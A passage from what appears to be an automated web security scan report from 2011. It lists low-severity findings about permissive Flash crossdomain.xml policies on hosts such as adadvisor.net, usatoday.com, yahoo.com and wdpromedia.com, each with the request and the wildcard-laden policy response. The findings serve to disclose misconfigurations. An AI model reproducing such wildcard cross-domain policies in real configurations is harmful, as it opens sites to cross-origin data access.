6.56. http://adadvisor.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:31:36 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 478
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...

6.57. http://api.tweetmeme.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.tweetmeme.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 16 May 2011 01:25:09 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
Expires: Mon, 16 May 2011 01:25:25 +0000 GMT
Etag: 686d9b984ed45b19cd2ab4ba31d09141
X-Served-By: vanga

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/>
...[SNIP]...

6.58. http://content.usatoday.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:45 GMT
Accept-Ranges: bytes
ETag: "2bdf8b1217e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 16 May 2011 01:19:47 GMT
Connection: close
Content-Length: 1558

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

6.59. http://contextweb.usatoday.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://contextweb.usatoday.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: contextweb.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:45 GMT
ETag: "8034251217e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 16 May 2011 01:19:45 GMT
Content-Length: 1558
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

6.60. http://cookex.amp.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cookex.amp.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cookex.amp.yahoo.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:24:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 14 May 2010 21:53:13 GMT
Accept-Ranges: bytes
Content-Length: 1548
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
...[SNIP]...
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...

6.61. http://dcl.wdpromedia.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://dcl.wdpromedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: dcl.wdpromedia.com

Response

HTTP/1.0 200 OK
Content-Length: 8308
Content-Type: text/xml
Last-Modified: Sat, 26 Feb 2011 00:32:21 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Expires: Mon, 16 May 2011 01:27:01 GMT
Cache-Control: max-age=300
Date: Mon, 16 May 2011 01:24:39 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.go.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="avmk.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="vmk.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.disney.go.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.starwave.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.online.disney.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="espnwwos.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworldsports.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="adisneyworldsports.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.disneyyouth.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="youthprograms.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyweddings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneymeetings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="adisneyworldmeetings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="jp.dvc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvcmember.disney.co.jp" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvcmember.disney.co.jp" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="advc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvc-qa1-1.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-1.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-2.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-2.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-1.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-1.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-2.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-2.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="disneycruise.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneycruise.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="disneyworld.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyworld.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="disneyparks.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyparks.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="disneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="abd.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="abd.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="destinations.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="adestinations.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="radio.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneysmagicalbeginnings.com" />

<allow-access-from domain="*.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="park.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secure2.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secure.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="mediacdn.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="mediacdn2.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="ahongkongdisneyland.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secondthought.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.adtoolsinc.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.unionstudio.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cyberwocky.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.peelinteractive.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.northkingdom.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="bookwdw.reservations.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="content-loc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="static-loc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="content-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="static-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dnhwdproweb01.online.disney.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-sl.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="as1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw2.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="parksandresorts.wdpromedia.com" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="disneyworld2-qa2.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disney.prizelogic.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.nthdegreefx.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-qa2-1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-qa2-2.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.triggerla.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="*.triggersh.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="*.omniticket.net" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.omniticket.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.omniticket.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dnhwdproweb01.wdig.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="dlr1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dlr2.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="m.disneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.disneyland-qa3.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="m.disneyland-sl.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="m.disneyland-dev9.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-dev9.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-local.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-lt.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-qa3.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-sl.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="qa-generic03.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyyouth-qa5.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disney.thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disney.stage2.thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyinstitute.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-qa01.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-qa02.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="dvc-nap7.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...

6.62. http://dcl2.wdpromedia.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: dcl2.wdpromedia.com

Response

HTTP/1.0 200 OK
Content-Length: 8308
Content-Type: text/xml
Last-Modified: Sat, 26 Feb 2011 00:32:24 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Expires: Thu, 21 Apr 2011 01:15:30 GMT
Cache-Control: max-age=160
Date: Mon, 16 May 2011 01:23:40 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.go.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="avmk.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="vmk.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.disney.go.com" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.starwave.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.online.disney.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="espnwwos.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworldsports.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="adisneyworldsports.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.disneyyouth.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="youthprograms.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyweddings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneymeetings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="adisneyworldmeetings.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="jp.dvc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvcmember.disney.co.jp" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvcmember.disney.co.jp" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="advc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dvc-qa1-1.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-1.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-2.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa1-2.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-1.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-1.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-2.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="dvc-qa2-2.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="disneycruise.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneycruise.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="disneyworld.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyworld.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="disneyparks.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyparks.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="disneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adisneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="abd.disney.go.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="abd.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="destinations.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="adestinations.disney.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="radio.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneysmagicalbeginnings.com" />

<allow-access-from domain="*.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="park.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secure2.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secure.hongkongdisneyland.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="mediacdn.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="mediacdn2.hongkongdisneyland.com.cn" to-ports="*" />
...[SNIP]...
<allow-access-from domain="ahongkongdisneyland.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.secondthought.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.adtoolsinc.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.unionstudio.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cyberwocky.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.peelinteractive.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.northkingdom.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="bookwdw.reservations.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="content-loc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="static-loc.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="content-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="static-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dnhwdproweb01.online.disney.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-dev1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-sl.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="as1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="wdw2.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="parksandresorts.wdpromedia.com" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="disneyworld2-qa2.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disney.prizelogic.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="www.nthdegreefx.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-qa2-1.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="disneyworld-qa2-2.disney.go.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.triggerla.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="*.triggersh.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="*.omniticket.net" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.omniticket.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.omniticket.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="dnhwdproweb01.wdig.com" to-port="*" />
...[SNIP]...
<allow-access-from domain="dlr1.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="dlr2.wdpromedia.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="m.disneyland.disney.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.disneyland-qa3.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="m.disneyland-sl.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="m.disneyland-dev9.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-dev9.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-local.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-lt.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-qa3.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyland-sl.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="qa-generic03.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disneyyouth-qa5.disney.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disney.thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="thismoment.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="disney.stage2.thismoment.com" to-ports="*" secure="false" />
